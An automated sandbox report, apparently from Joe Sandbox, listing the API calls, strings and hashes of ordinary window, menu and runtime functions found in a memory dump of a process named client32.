Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64

Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114513D
_memset.LIBCMT ref: 1114515E
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
CreatePopupMenu.USER32 ref: 111451AA
GetMenuItemCount.USER32(?), ref: 111451D3
InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
GetMenuItemCount.USER32(?), ref: 111451EB

Strings

0, xrefs: 11145177

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
String ID: 0
API String ID: 74472576-4108050209
Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0

Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
GetSubMenu.USER32(00000000,00000000), ref: 11003343
GetMenuItemCount.USER32(00000000), ref: 11003367
DestroyMenu.USER32(00000000), ref: 11003379

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100332E, 11003354
hSub, xrefs: 11003359
hMenu, xrefs: 11003333

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9

Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,771B23A0,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
SetPriorityClass.KERNEL32(?,?), ref: 1103D167
IsWindow.USER32(?), ref: 1103D17E
SendMessageA.USER32(?,0000004A,0002045A,00000492), ref: 1103D1B8
_free.LIBCMT ref: 1103D1BF

Strings

Show16, xrefs: 1103D0E9

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
String ID: Show16
API String ID: 625148989-2844191965
Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81

Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

IsWindow.USER32(0000070B), ref: 110ED02A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
SetCursor.USER32(00000000), ref: 110ED0B8

Strings

pEnLink!=0, xrefs: 110ED05C
IsWindow(hRich), xrefs: 110ED03E
..\CTL32\NSWin32.cpp, xrefs: 110ED039, 110ED057

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
API String ID: 2735369351-763374134
Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6

Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B350
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8

Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB

waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
_free.LIBCMT ref: 1100B3C8
_free.LIBCMT ref: 1100B3CE

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64

Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
GetSubMenu.USER32(00000000,00000000), ref: 110033C3
DestroyMenu.USER32(00000000), ref: 110033F2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 110033AE, 110033D4
hSub, xrefs: 110033D9
hMenu, xrefs: 110033B3

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9

Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB

Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783

EqualRect.USER32(?,?), ref: 1107740C
SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
m_hWnd, xrefs: 11077447

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$DeferEqualPointsRect
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2754115966-2830328467
Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4

Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 110ED0D9
SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsWindow(hRich), xrefs: 110ED0ED
..\CTL32\NSWin32.cpp, xrefs: 110ED0E8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
API String ID: 2446111109-1196874063
Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED

Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9

Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
Sleep.KERNEL32(00000032), ref: 1104F383

Strings

Global\Client32Provider, xrefs: 1104F1BB
error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
API String ID: 3682529815-1899068400
Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12

Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 11171312

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__getptd.LIBCMT ref: 11171329
__amsg_exit.LIBCMT ref: 11171337
__lock.LIBCMT ref: 11171347
__updatetlocinfoEx_nolock.LIBCMT ref: 1117135B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B

Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110670A8
GetTickCount.KERNEL32 ref: 110671F0

Strings

General, xrefs: 110671DF
TicklePeriod, xrefs: 110671DA

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
